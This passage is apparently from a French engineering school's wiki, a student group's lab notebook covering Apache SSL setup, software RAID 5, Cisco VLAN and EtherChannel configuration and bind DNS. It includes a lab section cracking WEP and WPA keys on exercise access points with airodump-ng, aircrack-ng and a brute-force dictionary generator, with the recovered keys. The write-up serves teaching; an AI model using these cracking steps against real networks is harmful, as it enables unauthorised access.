 For some fields there will be a default value,&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord &lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:bielloumutherfucker.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 Please enter the following 'extra' attributes&lt;br /&gt;
 to be sent with your certificate request&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, ls clefs ont été générées : &lt;br /&gt;
 &lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
 Ironman.csr  Ironman.key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Et nous pouvons donner la CSR à Gandhi afin d'activer la procédure d'activation.&lt;br /&gt;
&lt;br /&gt;
De façon à recevoir le mail sur admin@bielloumutherfucker.space, nous devons modifier le fichier /etc/aliases et y rajouter la ligne suivante:&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat validé, il faut déplacer les clefs dans les dossiers suivants :&lt;br /&gt;
&lt;br /&gt;
 cp Ironman.key /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
 cp certificate-380187.crt /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
 cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem (clef intermédiaire)&lt;br /&gt;
&lt;br /&gt;
On effectue ensuite un rehash des certificats :&lt;br /&gt;
&lt;br /&gt;
 c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 6860aa7d.0&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 5692355e.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; a036afff.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; 4390636f.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le fichier ''000-bielloumutherfucker.space-ssl.conf'' dans le dossier /etc/apache2/sites-available :&lt;br /&gt;
&lt;br /&gt;
 #NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.167:443&amp;gt;&lt;br /&gt;
                ServerName www.bielloumutherfucker.space&lt;br /&gt;
                ServerAlias bielloumutherfucker.space&lt;br /&gt;
                DocumentRoot /var/www/html/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/html&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
 ServerName &amp;quot;bielloumutherfucker.space&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Puis on modifie le fichier /etc/apache/ports.conf afin qu'apache écoute sur le port 443 (ssl) :&lt;br /&gt;
&lt;br /&gt;
 Listen 80 443&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On doit ensuite autoriser apache à utiliser son module ssl : &lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Puis on autorise notre site à utiliser ssl :&lt;br /&gt;
&lt;br /&gt;
 a2ensite 000-bielloumutherfucker.space-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Ensuite :&lt;br /&gt;
&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
 service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Maintenant, lorsqu'on se connecte sur notre site avec le préfixe &amp;quot;https://&amp;quot;, le site s'ouvre bien, et on aperçoit un cadenas vert certifiant que le site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ssl.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données===&lt;br /&gt;
&lt;br /&gt;
Nous commençons dans un premier temps à créer trois partitions via les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/ironman-1 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/ironman-2 -v&lt;br /&gt;
 lvcreate -L 1G -n /dev/virtual/ironman-3 -v&lt;br /&gt;
&lt;br /&gt;
Puis nous modifions notre fichier de configuration de machine virtuelle Ironman.cfg en y ajoutant les trois lignes suivantes dans la partie '''disk''':&lt;br /&gt;
&lt;br /&gt;
 'phy:/dev/virtual/ironman-1,xvdd,w',&lt;br /&gt;
 'phy:/dev/virtual/ironman-2,xvde,w',&lt;br /&gt;
 'phy:/dev/cirtual/ironman-3,xvdf,w',&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, on relance notre machine virtuelle, puis on y installe le paquet mdadm.&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf &lt;br /&gt;
&lt;br /&gt;
On affiche ensuite la configuration actuelle de /dev/md0:&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 0&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
On sauvegarde ensuite la configuration de md0 :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier /datamd0 que nous montons sur notre device md0 :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mkfs /dev/md0&lt;br /&gt;
 root@Ironman:~# mkdir /datamd0&lt;br /&gt;
 root@Ironman:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ensuite créer un fichier de test sur le raid 5 (iron-man.txt):&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/datamd0# ls&lt;br /&gt;
 lost+found  test_ironman.txt&lt;br /&gt;
&lt;br /&gt;
On ferme ensuite notre machine, puis nous modifions son fichier .cfg afin qu'elle ne prenne plus en compte la partition xvdd (on commente la ligne). &lt;br /&gt;
Nous relançons ensuite la machine virtuelle, puis nous réaffichons la configuration de md0 :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Thu Dec  8 17:05:13 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 6&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On constate bien que la partion xvdd a été enlevée. Et que le fichier de test sur le raid est toujours présent :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# ls /datamd0/&lt;br /&gt;
 lost+found  test_ironman.txt&lt;br /&gt;
&lt;br /&gt;
===Création du serveur d'authentification FreeRadius===&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35899</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35899"/>
				<updated>2016-12-12T10:13:36Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
